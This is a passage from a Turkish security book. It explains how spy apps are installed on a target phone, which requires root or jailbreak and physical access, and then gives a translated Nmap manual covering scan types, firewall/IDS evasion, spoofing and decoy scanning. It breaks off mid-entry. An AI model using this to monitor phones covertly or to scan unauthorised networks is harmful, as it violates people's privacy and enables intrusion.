iPhone üzerine yüklenemez. İlgilenenler bu konuyu What is Jailbreaking ve
How to Jailbreak an iPhone sitelerinden öğrenebilirler.
Android için de root olmak gereklidir. Bazıları root olmak gereksiz derler ama
örneğin WhatsApp izlemek için root gereklidir. Ayrıca Mobile Spy için de root
gereklidir. Yani hedef telefonda bu yazılımlar root olunca yüklenebilir.
Yazılımların telefon gereksinimleri
Bu yazılımlar Internet bağlantısı olan telefonlarda kullanılabilir. Yani akıllı
telefonlarda... Etkin veri akışı olması önemlidir ama Wi-Fi erişimi de kısıtlı
olarak kullanılabilir. Tüm izleme bilgileri web bağlantısından aktarılır. Internet
yoksa izleme de olmaz. Telefon kullanılan yazılımla uyumlu olmalıdır. Bunun
için Phone Compatibility incelenebilir. Ayrıca, belki de en önemlisi, yazılım
hedef telefondaki işletim sisteminde çalışabilmelidir.
Yazılımlar nasıl çalışır?
Casus yazılım hedef telefona yüklenir.
Web bağlantısı üzerinden tüm bu bilgi firmanın sunucularına gönderilir.
Sonra bu bilgileri görüntülemek için kullanıcı adı ve şifreyle sunucu web
sitesine giriş yapılır.
Casus yazılımı uzaktan yüklemek
Web sitesinde bunun olanaksız olduğu anlatılıyor. Yani casus yazılım ancak
telefonda fiziksel bağlantı ile yüklenebilirmiş. Bu konuda SpyzRus.net
sitesindeki belgenin okunması önerilmektedir.
Yukarıdaki açıklamadan, akıllı telefonu hack etme konusunda araştırma
yapmak gerektiği anlaşılmaktadır. Belki hack etme yöntemleriyle uzaktan
telefona erişilebilir. Ya da SpyzRus.net sitesinde belirtildiği gibi uydurma

yazılım alarak kendinizi kandırmış olursunuz. Ben biraz da hacker açısından
olaya bakmak istedim. Ek-8'de Android telefonlarda kullanılan araçları
anlatmaya çalıştım. Bazı araçlar telefonu hack için kullanmaya yararken,
bazı araçlarla bir telefon nasıl hack edilir gibi kavramlar anlatılmıştır.
İlgilenenler burada yazılanlara da bakabilir.
Yazılım Yükleme
Önce uygun yazılım seçilir. Belirtilen adresten yüklemesi yapılır. Ayarlar
yapıldıktan sonra telefon kapatılıp yeniden başlatılır. İşlem bu kadar kolaydır.
Ama yanlış yazılım seçilirse, Internet bağlantısı zayıfsa, izleme başarılı
olamayabilir.
Cep Telefonlarını Hackleme
Bu konuda ayrıntılı bilgi ve kullanılabilecek yazılımlar Ek-8'de açıklanmıştır.
Bu nedenle burada ayrıntıya girilmemiştir.

EK-1
NMAP KULLANICI KİTABI
İÇİNDEKİLER
Açıklama
Seçenekler (özet)
Hedef tanımları
Sunucu Belirleme
Yerel kapı tarama
Kapı tarama teknikleri
Kapı tanımları ve tarama sırası
Servis ve sürüm belirleme
İşletim Sistemi belirleme
Nmap komut makinesi (NSE)
Zamanlama ve verim
Güvenlik kalkanı/IDS kaçamakları ve gizlenme (spoofing)
Çıktılar
Diğer Seçenekler
Çalışırken araya girme
Örnekler

Açıklama
Nmap (Network Mapper) ağları incelemek ve güvenlik sistemini denetlemek
için hazırlanmış bir açık kaynak araçtır. Büyük ağları hızla taramak için
tasarlanmıştır. Aslında tek sunucu için de doğru düzgün çalışabilir ama ham
IP paketleri kullanarak ağda hangi sürücüler var, hangi servisler (uygulama
adı ve sürümüyle) var bulabilir. Hangi işletim sistemlerinin kullanıldığı, nasıl
bir güvenlik kalkanı kurulduğu bu programın genel özellikleri arasındadır.
Birçok ağ ve sistem yöneticisi, ağda bulunan sunucular, yazılım sürümü gibi
konularda nmap kullanmaktadır.
Örnek bir nmap çıktısı:
# nmap -A -T4 scanme.nmap.org
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.029s latency).
rDNS record for 74.207.244.221: li86-221.members.linode.com
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
| ssh-hostkey: 1024 8d:60:f1:7c:ca:b7:3d:0a:d6:67:54:9d:69:d9:b9:dd (DSA)
|_2048 79:f8:09:ac:d4:e2:32:42:10:49:d3:bd:20:82:85:ec (RSA)
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
|_http-title: Go ahead and ScanMe!
646/tcp filtered ldp
1720/tcp filtered H.323/Q.931
9929/tcp open nping-echo Nping echo
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.39
OS details: Linux 2.6.39
Network Distance: 11 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
[Cut first 10 hops for brevity]
11 17.65 ms li86-221.members.linode.com (74.207.244.221)
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

Seçenekler (özet olarak)
Eğer nmap parametreler yazılmadan çalıştırılırsa kullanılabilecek parametre
seçenekleri elde edilir.
Nmap 6.26SVN ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
Kullanım: nmap [Tarama türleri] [Seçenekler] {hedef özellikleri}
TARGET SPECIFICATION: (HEDEF ÖZELLİKLERİ)
Can pass hostnames, IP addresses, networks, etc.
Sunucu adı, IP adresi, ağlat vb. kullanılabilir
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
Örneğin: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL : Input from list of hosts/networks
giriş olarak sunucu/ağ_maskesi listesi
-iR : Choose random targets
Rastgele hedefler seç
--exclude : Exclude hosts/networks
sunuc/ağ_maskesi ile belrtilenleri dışla
--excludefile : Exclude list from file
dışlanacaklar listesini doyadan al
HOST DISCOVERY:
-sL: List Scan - simply list targets to scan
taranacak hedefleri listele
-sn: Ping Scan - disable port scan
kapı taramasını kapat
-Pn: Treat all hosts as online -- skip host discovery
Sunucu bulmayı atla
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
istenen kapılarda buluş yap
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
yankı, zaman damgası ve ağ maskesi istekleri için sorgulama bulma
-PO[protocol list]: IP Protocol Ping
IP protokolünde ping
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
DNS çözümü arama/her zaman ara [varsayılanı: bazen]
--dns-servers : Specify custom DNS servers
DNS sunucularının tanımlanması
--system-dns: Use OS's DNS resolver
İşletim sisteminin DNS çözümlemesini kullan
--traceroute: Trace hop path to each host
Her sunucu için “hop” yolunu tara
SCAN TECHNIQUES: (Tarama Teknikleri)
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
TCP SYN/Connect()/ACK/Window/Maimon taramaları yap
-sU: UDP Scan
UDP taraması yap
-sN/sF/sX: TCP Null, FIN, and Xmas scans
TCP Null, FN ve Xmas taraması yap
--scanflags : Customize TCP scan flags
TCP tarama kodlarını ayarla
-sI : Idle scan
Boş taraması yap
-sY/sZ: SCTP INIT/COOKIE-ECHO scans
INIT/COOKIE-ECHO taraması yap

-sO: IP protocol scan
IP protokol taraması yap
-b : FTP bounce scan
FTP sekme taraması yap
PORT SPECIFICATION AND SCAN ORDER: (Kapı tanımı ve tarama sırası)
-p : Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
Yalnız belirtilen kapıları tara
Örneğin: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
-F: Fast mode - Scan fewer ports than the default scan
Varsayılan taramadan daha az kapı tara
-r: Scan ports consecutively - don't randomize
Kapıları peş peşe tara rastgele sıralama
--top-ports : Scan most common ports
En çok bilinen kadar kapıyı tara
--port-ratio : Scan ports more common than
En çok bilinen kapılardan ilk kadar olanını tara (ratio = oran)
SERVICE/VERSION DETECTION: (Servis/Sürüm Bulma)
-sV: Probe open ports to determine service/version info
Açık kapıları servis/sürüm bulmak için sorgula
--version-intensity : Set from 0 (light) to 9 (try all probes)
sıfıran (hafif) 9'a (tüm sorguları dene) kadar değişen değer ata
--version-light: Limit to most likely probes (intensity 2)
En uygun sorguyla sınırla (intesity 2)
--version-all: Try every single probe (intensity 9)
Her bir sorguyu dene (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)
Tarama işleminin ayrıntılarını göster
SCRIPT SCAN: (Program tarama)
-sC: equivalent to –script=default
“-script=default” demekle eş değerdir.
--script=: is a comma separated list of
directories, script-files or script-categories
virgüllerle ayrılmış dosya yolları, program dosyaları ya da program sınıfları listesidir.
--script-args=: provide arguments to scripts
Programlara parametre değeri sağlar
--script-args-file=filename: provide NSE script args in a file
NSE program parametre değerlerini dosyadan sağlar
--script-trace: Show all data sent and received
Gönderilen ve alınan tüm verileri göster
--script-updatedb: Update the script database.
Program veri tabanını güncelle
--script-help=: Show help about scripts.
Programlar için yardımı göster.
is a comma separted list of script-files or
script-categories.
virgülle ayrılmış program dosyaları ya da program sınıfları listesidir.
OS DETECTION:
-O: Enable OS detection
işletim sistemi bulmayı aç
--osscan-limit: Limit OS detection to promising targets
Söz verilen hedefler için işletim sistemi bulmayı sınırla
--osscan-guess: Guess OS more aggressively
İşletim Sistemini daha istekli tahmin et

TIMING AND PERFORMANCE:
Options which take are in seconds, or append 'ms' (milliseconds),
's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
ile belirtilen seçenek saniye türündendir. Ardına “ms” eklenince
mili saniye olur. Dakika için “m”, saat için “h” eklenir.
-T: Set timing template (higher is faster)
zaman şablonunu ayarla (yükseldikçe hızlanır)
--min-hostgroup/max-hostgroup : Parallel host scan group sizes
paralel sunucu tarama grup boyu
--min-parallelism/max-parallelism : Probe parallelization
sorgu paralelleştirilmesi
--min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout : Specifies
probe round trip time.
Sorgu dönme zamanını belirtir
--max-retries : Caps number of port scan probe retransmissions.
Kapıya gönderilecek sorgunun yeniden gönderilme aralığı
--host-timeout : Give up on target after this long
Hedeften bu süre dolunca vazgeç
--scan-delay/--max-scan-delay : Adjust delay between probes
Sorgular arasındaki beklemeyi ayarla
--min-rate : Send packets no slower than per second
Paketleri belirtilen saniyeden daha yavaş gönderme
--max-rate : Send packets no faster than per second
Paketleri belirtilen saniyeden hızlı gönderme
FIREWALL/IDS EVASION AND SPOOFING:
-f; --mtu : fragment packets (optionally w/given MTU)
paketleri parçalama (MTU verme seçeneği ile)
-D : Cloak a scan with decoys
tuzaklı taramayı pelerinle gizle
-S : Spoof source address
Kaynak adresini atlat
-e : Use specified interface
Belirtilen arayüzü kullan
-g/--source-port : Use given port number
Belirtilen kapı numarasını kullan
--data-length : Append random data to sent packets
Giden paketlere rastgele veri ekle
--ip-options : Send packets with specified ip options
Paketleri belirtilen IP seçenekleriyle gönder
--ttl : Set IP time-to-live field
IP bırakma zamanını ayarlama alanı
--spoof-mac : Spoof your MAC address
sizin MAC adresinizi atlat
--badsum: Send packets with a bogus TCP/UDP/SCTP checksum
Hatalı toplama denetimi olan paketler gönder
OUTPUT: (ÇIKTI)
-oN/-oX/-oS/-oG : Output scan in normal, XML, s|

--open: Only show open (or possibly open) ports
yalnız açık kapıları göster
--packet-trace: Show all packets sent and received
Alınan ve gönderilen tüm paketleri göster
--iflist: Print host interfaces and routes (for debugging)
sunucu arayüzlerini ve yönlendirmelerini göster
--log-errors: Log errors/warnings to the normal-format output file
normal çıktı dosyasına hata ve uyarıları yazdır
--append-output: Append to rather than clobber specified output files
çıktı dosyasının ardına ekle
--resume : Resume an aborted scan
durmuş, bozulmuş taramayı devam ettir.
--stylesheet : XSL stylesheet to transform XML output to HTML
XML çıktısını HTML'e çevirmek için XSL stil sayfasını tanımlama
--webxml: Reference stylesheet from Nmap.Org for more portable XML
Daha taşınabilir XML yaratmak için stil sayfasını nmap.org'dan sağla
--no-stylesheet: Prevent associating of XSL stylesheet w/XML output
XML çıktıları için XSL kullanımını kaldır.
MISC: (DİĞER)
-6: Enable IPv6 scanning (IPv6 taramasını aç)
-A: Enable OS detection, version detection, script scanning, and traceroute
(İşletim sistemi, sürüm, program taramasını aç ve iletişim yolunu izle)
--datadir : Specify custom Nmap data file location
(değiştirilen nmap dosya yolunu belirle)
--send-eth/--send-ip: Send using raw ethernet frames or IP packets
(IP paketlerini ve ham ethernet parçalarını kullan)
--privileged: Assume that the user is fully privileged
(kullanıcı tümüyle yetkili varsay)
--unprivileged: Assume the user lacks raw socket privileges
(kullanıcı yetkili değil varsay)
-V: Print version number
(sürüm numarasını yazdır)
-h: Print this help summary page.
(Bu yardım özetini yazdır)
EXAMPLES: (ÖRNEKLER)
nmap -v -A scanme.nmap.org
nmap -v -sn 192.168.0.0/16 10.0.0.0/8
nmap -v -iR 10000 -Pn -p 80
DAHA ÇOK SEÇENEK VE ÖRNEK İÇİN (http://nmap.org/book/man.html) ADRESİNE BAKIN.

Hedef tanımları
Komut satırında seçenek olarak gösterilmeyen her şey hedef sunucuyu
tanımlar. En temel olanı taranacak sunucunun adı ya da IP numarasının
yazılmasıdır. Bazı koşullarda ağdaki tüm sunucuların taranması istenebilir.
Bu durumda nmap CIDR türü IP adresi yazılımına olanak verir (/bit_sayısı).
Bu durumda ilk /bit_sayısı kadar sunucu IP adresi eşit olanlar taranır.
En küçük /bit_sayısı /0 olur ki tüm Internet demektir. Ama 192.168.1.2/24
yazıldığında 192.168.1 ile başlayan tüm sunucular taranacak demektir.
Genelde hedef sunucular komut satırında yazılsa da -iL
biçiminde bir tanımla (parametre seçeneğiyle) hedef sunucular dosyadan
alınabilir. Bu dosyada açıklamalar ilk kolonunda # olan satırlarda bulunur.
Internet taramalarında ya da başka tür geniş tarama ortamlarında -iR
komutuyla belirtilen sayıda rastgele seçilmiş sunucular
taranır.
Bazı durumlarda tarama yapılacak sunuculardan istenmeyenler olabilir.
Bunları “-–exclude sunucu-1 sunucu-2 ... sunucu-n” biçiminde yazabiliriz ya
da bu sunucuların IP adreslerini bir dosyaya yazıp “-–excludefile dosya_adı”
biçiminde yazarak kullanabiliriz.
Sunucu Belirleme
Sunucu belirlemede yapılacak ilk iş kocaman bir ağda ilgilenilecek etkin
sunucu sayısını gerekli sayıya indirgemektir. Bir ağdaki sunucuların tüm
kapılarını taramak hem yavaş hem de gereksizdir. Ama burada işin ilginç
yanı tarama amacı olduğunu da unutmamak gerekir. Ağ yöneticisi belirli bir
kapısı kullanan sunucularla ilgilenirken güvenlik yöneticisi tüm ağdaki tüm
IP'lerle ilgilenmek isteyecektir. Bir yönetici için yalnız ICMP ping göndererek
sunucunun çalıştığını öğrenmesi yeterli olabilecektir. Ama dışarından ağa
sızan biri için birçok konunun incelenmesi güvenlik kalkanının durumunun
anlaşılması için önemli olabilir. İsteklerin çok değişik olması göz önünde
bulundurularak nmap seçenekleri de oldukça geniş bir yelpazeyi içerecek
biçimde düzenlenmiştir. Bazen kullanıcı “ping” adımını tümüyle atlayabilir,
bazı koşullarda birçok kapı için TCP SYN/ACK, UDP, SCTP INIT ve ICMP
karışımını kullanabilir.
Aşağıdaki parametre seçenekleri sunucu belirlemede kullanılabilir:
-sL (tarama_listesi)
Taranacak sunucuların listesi bu parametre ile belirtilir. Bu biçimde
tanımlanmış olsa bir nmap ters IP taraması yaparak sunucunun adını
almak ister. Kapı taraması, ping taraması, işletim sistemi saptama gibi
daha yüksek seçenekler bununla beraber kullanılamaz. Bu parametre
taranacak sunucuların listesini verir.

-sn (kapı taraması yok)
Sunucuyu bulduktan sonra kapı taraması yapılmamasını söyler. Burada
amaç fazla ayrıntıya girmeden ağdaki sunucuları bulmaktır. Buna
“ping” taraması da denir. Sistem Yöneticileri bunu kullanışlı bulabilirler.
Amaçları sunucu ve servislerin çalıştığını görmek olduğundan ayrıntıya
girmek gerekmez. -sn seçeneğinde yapılanlar ICMP istek yankısı, 443
nolu kapıya TCP SYN, 80 nolu kapıya TCP ACK vw ICMP zaman
damgasıdır. Yetkisiz biri tarafından çalıştırıldığında yalnız SYN
komutları üretilir. Yetkili biri kullandığında –sendIP seçeneği yoksa
sunucu adı da bu komutla elde edilir. Eski sürümlerde -sn -sP olarak
bilinirdi.
-PS (TCP SYN)
SYN alanı atanmış olan boş bir ping paketi gönderir. Varsayılan kapı
nosu 80 olarak belirlenmiştir. Diğer kapılar da tanımlanabilir. Dil kuralı
-p de olduğu gibidir ama kapı türü için T: tanımlamak gerekmek.
Örneğin -PS22 ve -PS22-25,80,113,1050,35000 gibi yazım yapılabilir.
-PA (TCP ACK)
PS SYN ile aynı biçimde tanımlanır. Buradaki fark SYN yerine ACK
ataması yapılmış ping komutu vardır. Yetkisiz biri kullanırsa “connect”
komutu SYN ataması yapılarak işleme girer ACK kullanılmaz.
-PU (UDP)
Bu komutla kapılara UDP paketleri gönderilir. Pek çok kapı için UDP
komut boş olur ama bazı özel protokoller için UDP komutunda
protokole özel veri de bulunmalıdır. Ayrıntılı bilgi için
http://nmap.org/book/nmap-payloads.html adresine baş vurabilirsiniz.
“--data-legth” seçeneği her kapıya belirtilen uzunlukta rastgele veri
göndermeyi sağlar. “--data-length” 0 seçeneği veri uzunluğunu sildiği
için boş UDP mesajı gönderilmiş olur. Kapı listesi -PS ve _PA
seçeneklerindeki gibidir. Varsayılan kapı numarası 40125 olarak
belirlenmiştir.
Eğer kapı kapalıysa UDP paket port'a erişilemiyor türü ICMP paketi
döndürür. Bu seçeneğin en önemli yararı yalnız TCP güvenlik kalkanı
olan ağlarda güvenlik kalkanını delip geçmesidir.
Örneğin eskiden Linksys BEFW11S4 kablosuz ADSL cihazı TCP
kapılarını varsayan olarak bloklamaktayken UDP kapıları açık
kalmaktaydı.

-PY (SCTP INIT)
Bu seçenek en küçük INIT yığını olan SCTP paketi gönderir. Varsayılan
kapı numarası 80'dir. -PS, -PA gibi -PY için de port listesi tanımlanabilir.
INIT yığını karşı sisteme bir ilişki kurulacağını belirtir. Normal
koşullarda karşı taraftaki kapı kapanır ve oradan ABORT yığını döner.
Eğer kapı açık kalmışsa, hedef ikinci adıma geçer ve SCTP dört yönlü
el sıkışma işlemini INIT-ACK yığınıyla başlatır. Nmap çalıştırılan makine
işlevsel SCTP biriktirme özelliği (stack) varsa, COOKIE-ECHO yığını
yerine, ilişkiyi kesmek için ABORT yığını gönderir Bu da zaten dörtlü el
sıkışmadaki bir sonraki adımdır. Beklenmedik INIT-ACK yığınına karşılık
olarak ABORT paketleri nmap programından değil, nmap çalıştırılan
makinenin kernel kodundan iletilir Burada nmap INIT-ACK ya da ABORT
yanıtına bakmaz. Onun için önemli olan sunucunun var olması ve yanıt
veriyor olmasıdır.
-PE; -PP; -PM (ICMP ping türleri)
TCP, UDP ve SCTP sunucu bulma türlerine ek olarak nmap bilinen ping
programına uygun ping paketleri de gönderebilir. Nmap ICMP tip 8
(yankı isteği) paketlerini karşı sisteme gönderir ve tip 0 (yankı yanıtı)
bekler. Ama birçok güvenlik kalkanı bu tür paketleri engellemektedir.
Bu nedenle ICMP türü taramalar bilinmeyen IP'ler için pek de başarılı
arama türü değildir. Ama yerel ağı denetleyen sistem yöneticileri kendi
yerel ağlarında kullanıp doğru ve güvenilir sonuçlar alırlar.
-PO (IP protokol ping)
Yeni sunucu bulma tekniklerinde biri de IP protokolü ping komutudur.
IP başlığına gereken protokol numarası eklenmiş olarak paket gönderir.
Protokol listesi için kalıp TCP, UDP, SCTP için kullanılan kapı
numaralarıyla aynıdır. Eğer protokol belirtilmezse birden çok ICMP
paketi (protokol 1, 2, ve 4) ile gönderilir. ICMP, IGMP, TCP (protokol 6)
için, UDP (protokol 17) için ve SCTP (protokol 132) için normal protokol
başlıkları kullanılır ama diğerleri için IP başlığı dışında protokol
başlıkları yoktur ( ama “–-data-length” belirtilirse başlıklar da olur).
Bu seçenekte yanıt aynı protokolden olursa sunucu bu protokolü
anlıyor kabul edilirken ICMP mesajı geldiğinde, belirtilen protokol
sistemde tanımlı değildir diye yorumlanır.

-PR (ARP ping)
EN çok kullanılan nmap senaryolarından biri ethernet yerel ağını
taramaktır. Nmap ICMP yankı isteği gibi ham IP paketi göndermek
isterken işletim sistemi karşı tarafın donanım adresini (ARP adresi)
bilmek isteyebilir. Böylece ethernet mesaj yapısı düzgünce
adreslenmiş olur. Bu biraz masraflı bir yöntemdir. Çünkü işletim
sistemleri kısa sürede milyonlarca ARP isteğine yanıt verecek şekilde
tasarlanmamıştır.
--disable-arp-ping (no ARP or ND ping)
nmap normalde ARP ve ipv6 için çevre taraması (ND) yapar. Ama bu
kullanım biçimi proxy ARP ortamı için daha kullanışlıdır. Bu durumda
istenen her IP için proxy sunucu olumlu yanıt verecek ve sistemin canlı
olduğunu söyleyerek nmap sonuçlarını yanıltacaktır.
--traceroute (sunucuya kadar yolu tara)
Tarama sonrasında kullanılır. Kapı ve protokolü bilinen sunucuya
ulaşmak için bu seçenek kullanılır. Tüm taramalarla kullanılabilir (-sT
ve -sI hariç).
Traceroute düşük TTL paketi göndererek başlar. Aralardaki zaman
aşımı mesajı gönderen sunuculara kadar devam eder. Amaç hedef
sunucuya kadar arada nelerin olduğunu saptamaktır. Yalnız bir yerel
ağ taranıyorsa bu durumda nmap yalnız 2 paket gönderecektir.
-n (hiçbir zaman DNS çözümü yapma)
Bulanan IP adresinde DNS çözümüne gidilmemesi için kullanılır.
Böylece işlemler daha da hızlanmış olur.
-R (tüm hedefler için DNS çözümü istenecek)
Tüm aranan sunucular için ters DNS çözümü istenirken kullanılır. Ama
normal koşullarda aktif olan sunucular için kullanılması daha doğrudur.
--system-dns (sistem DNS çözümleyicisini kullanın)
nmap normalde sizin bilgisayarınızın bağlı olduğu DNS sunucuya direkt
mesaj göndererek DNS çözümü yapar ve yanıt bekler. Hızlı olması için
düzineler düzeyinde paralel istek yapılır.

--dns-servers server1 server2 ... server3
Yerel kapı tarama
Varsayılan olarak nmap genelde sizin bilgisayarın kullandığı DNS
sunucuyu kullanır. Başka DNS sunucular kullanmak için bu seçeneği
değerlendirebilirsiniz. Bazı özel ağları tararken bu komut gerekebilir.
Her DNS sunucu rDNS desteği vermeyebilir.
nmap başlangıçta kapı tarayıcı olarak çalıştırıldı. Zaman içinde gelişme
gösterdi ama ana işlevi hep kapı tarama oldu. En basit nmap
biçimindeki kullanımı sunucudaki 1000 kadar TCP kapısını tarar. Bu
taramalarda nmap kapısı 6 konumda tanımlar: opened, closed, filtered,
unfiltered, open|filtered, closed|filtered. Bu konumlar nmap tarafından bir
kapının görünüş biçimidir
Nmap tarafından bilinen altı kapı konumu şöyledir:
open (açık)
Bu konumda bir uygulama TCP, UDP ve SCTP paketlerini kabul
edebilmektedir. Bu konumu bulmak kapı taramasının hedefidir.
Güvenlikle uğraşanlar her açık kapının saldırı için önemli bir kapı
olduğunu bilirler. Açık kapı aynı zamanda bu servisin ağ içinde
kullanılabilir olduğunu da gösterir.
closed (kapalı)
Kapalı kapı erişilebilir demektir. Ama arkasında çalışan bir uygulama
yoktur. Ayrıca sunucunun IP adresinde var olduğu anlaşılır.
filtered (filitreli)
Paket elemesi yüzünden nmap kapı hakkında bilgi edinemez. Eleme
ayrı bir güvenlik kalkanı sunucusundan olabilir.
unfiltered (filitresiz)
Bunun anlamı kapıya erişim vardır. Ama kapı durumu nmap tarafından
bilinememektedir.
open|filtered (açık ve elemeli)
nmap kapı açık mı elenmiş mi bilemeyince bu konuma alır.
closed|filtered (kapalı ve elemeli)
nmap kapı kapalı mı yoksa elemeli mi bilemediğinde bu konuma alır.

Port (kapı) tarama teknikleri
İşi bilenler kapı taramasını doğru teknikle hemen yaparken, yeniler her şeyi
SYN ile çözmeye kalkarlar. Nmap ücretsiz olduğundan kapı taramasındaki
tek engel bilgidir.
Pek çok tarama teknikleri yalnız yetkili kullanıcıya açıktır. Çünkü bu teknikler
ham veri gönderip alırlar ve UNIX altında yalnız “root” yapabilir. Windows
işletim sisteminde de “administer” işi yapmalıdır. WinPcap yüklenmişse
sıradan kullanıcı da nmap çalıştırabilir. Eskiden “root” yetkisi sorundu ama
şimdi bilgisayar sistemleri ucuzladı ve herkesin kendi diz üstü bilgisayardan
işlem yapması kolaylaştı.
Nmap başarısı hedef sunuculardan ya da önlerindeki güvenlik kalkanından
gelen paketlerle ölçülür. Nmap açısından bir bilgisayarın güvenilir olmaması
alınan yanıtların tutarsızlığıyla doğru orantılıdır.
Aşağıda nmap tarafından desteklenen kapı tarama teknikleri anlatılmıştır.
-sS (TCP SYN tarama)
Bir çok iyi nedenden ötürü SYN seçeneği en çok kullanılan ve
varsayılan taramadır. Hızlı bir ağ altında güvenlik kalkanıyla
elenmemiş binlerce kapı bir kaç saniyede taranabilir. TCP bağlantısını
hiç bir zaman tamamlamaz.
Bu teknik her zaman yarı açık taramadır. Çünkü burada tam TCP
bağlantısı açmazsınız. SYN paketi gönderip SYN/ACK beklersiniz, yanıt
gelirse kapı dinlemededir. RST ise dinleme olmadığını belirtir.. Birkaç
deneme sonunda yanıt gelmezse, kapı elenmiş kabul edilir. Kapı ICMP
erişilemiyor hatası alırsa da elenmiş kabul edilir (tip 3, kod 1, 2, 3, 9,
10 ya da 13). Eğer SYN için ACK yanıtı gelirse kapı açık kabul edilir
(bakınız http://nmap.org/misc/split-handshake.pdf)
-sT /TCP connect tarama)
SYN bir seçenek olmadığı zaman bu varsayılan tarama biçimi olur. Yani
kullanıcı “root” yetkisine sahip değilse denmek istenmiştir. Nmap
işletim sistemine hedef sunucuyla bağlantıyı “connect” komutuyla
kurulmasını isteyerek işlemi başlatır. Sistem bağlantıyı yarım-bağlantı
yerine tamamlayarak bitirir. Eğer SYN varsa tabi ki tarama için daha iyi
bir çözümdür.

-sU (UDP tarama)
Bir çok servis TCP protokolüyle çalışırken, UDP servisleri yaygın
kullanım alanına sahiptir. DNS, SNMP ve DHCP (53, 161/162 ve 67/68
kapıları) sık kullanılanlardan ilk üçüdür.
UDP taraması TCP'ye göre daha yavaş olduğundan bazı tarayıcılar UDP
taramasını tümüyle atlarlar. Bu seçenek TCP SYN taramasıyla
birleştirilerek kullanılabilir. UDP taramasında açık ve elemeli kapılar hiç
yanıt vermezler ve nmap zaman aşımına düşer. Kapalı kapılar daha
büyük problemdir. Çoğu zaman ICMP hatası verir. Nmap ağ akışında
yığılma olmasın diye işlemi yavaşlatır. Yavaş sunucular için “-–hosttimeout”
parametresi kullanılabilir.
-sY (SCTP INIT tarama)
TCP ve UDP protokollerine göre daha yeni bir protokoldür. Aynı
zamanda çoklu tarama ve çoklu ana sistem seçenekleri de eklenmiştir.
Daha çok SS7/SIGTRAN türü servisler için kullanılır. SCTP INIT taraması
TCP SYN eşdeğeridir. Bu protokol ile açık, kapalı ve elenmiş kapı
konumları daha kolay ayrılabilir. Bu tekniğe yarı açık ilişki kurma denir
çünkü tam bir ilişki kurulmaz. INIT gönderilir ve ACK beklenir. Gelirse
kapı açıktır, yerine ABORT gelirse kapı dinlemede değildir. Bir kaç
deneme sonunda hiç mesaj gelmezse kapı elenmiştir.
-sN; -sF; -sX (TCP NULL, FIN ve Xmas tarama)
Bu üç tarama türleri ve daha başkaları (--scan-flag kullanılarak) açıkla
kapalı konum arasında TCP döngü açığı bulmaya çalışır.
-sN (NULL tarama)
TCP başlığında veri yoktur
-sF (FIN tarama)
yalnız TCP FIN bit değeri 1 yapılır.
-sX (Xmas tarama)
FIN, PSH ve URG bitlerini yakarak Noel ağacı gibi renkli bir paket
oluşturur.
Bu üç tür TCP paketlerindeki bit değerleri dışında birbirleriyle aynı
özelliktedir. Eğer RST paketi alınırsa kapı kapalıdır. ICMP erişilemez
hatası alınırsa kapı elenmiştir. Hiç yanıt alınmazsa open|filtered
konumundadır.

-sA (TCP ACK tarama)
Burada amaç açık ya da açık|elenmiş kapılar değildir. Amaç güvenlik
kalkanının özelliklerini anlamaktır. Burada paketin yalnız ACK biti
vardır. Açık ve kapalı kapılar RST döndürür. Bunlar elenmemiş olarak
kaydedilir. ICMP mesajı döndürenlerse elenmiş kapılardır.
-sW (TCP Window tarama)
Sistemlerdeki uygulamaların farklarına göre ACK taramasıyla aynı
olmasına rağmen açık ve kapalı kapılar arasında ayrım
yapabilmektedir. Açık sistemlerde RST mesajlarında bile bazı sistemler
olumlu pencere boyu döndürürler (pencere/window için TCP
protokolüne bakın). Bu uygulamayı denetlemeyen sistemlerde tüm
kapılar kapalı gözükür. Bazı küçük kullanıcı ortamı olan ve yaygın
olmayan sistemlerde uygulama bağımlı çözüm üretilmemiş
olduğundan güvenilir sonuçlar alınamayabilir.
-sM (TCP Maimon tarama)
Bu tarama biçimini bulan kişinin soyadını taşır. FIN/NULL/Xmas
tekniğiyle aynıdır tek fark pakette FIN/ACK birlikte yakılmıştır. Eğer
kapı açık/kapalı ise RST üretilir ama pek çok eminde kapı açıksa
pakete yanıt verilmez.
--scan-flag (kullanıcıya özel tarama)
Bu seçenekle ileri düzeydeki nmap kullanıcıları kendi tarama
yöntemlerini paketlerdeki bitlerden hangilerini yakacaklarını
belirleyerek saptayabilirler. URG, ACK, PSH, RST, SYN, ve FIN bitlerini
karıştırarak seçenek içinde kullanmak mümkündür. Tanımlar yerine
biliyorsanız sayısal değerleri de kullanabilirsiniz.
Bunlara ek olarak TCP tarama türlerinden -sA ya da -sF de
kullanabilirsiniz.
-sZ (SCTP COOKIE-ECHO tarama)
Bu tarama yöntemi daha gelişmiş olanıdır. Açık kapıarda SCTP
uygulaması sessizce COOKIE yığını olan paketleri siler. Bu özelliği
kullanan tarama yöntemi güvenlik kalkanlarında COOKIE ECHO
engellemesi olmasa bile INIT engellemesi olabileceği durumlara göre
daha avantajlıdır.

-sI [:] (idle tarama)
Bu gelişmiş tarama yöntemi gerçek anlamda hedef sunucu için kör
kapı taraması yapar. Sizin bilgisayarınızın IP'sinden hedefe gerçek
paket gönderme yapılmaz. Buna karşın bir zombi sunucudan yan kanal
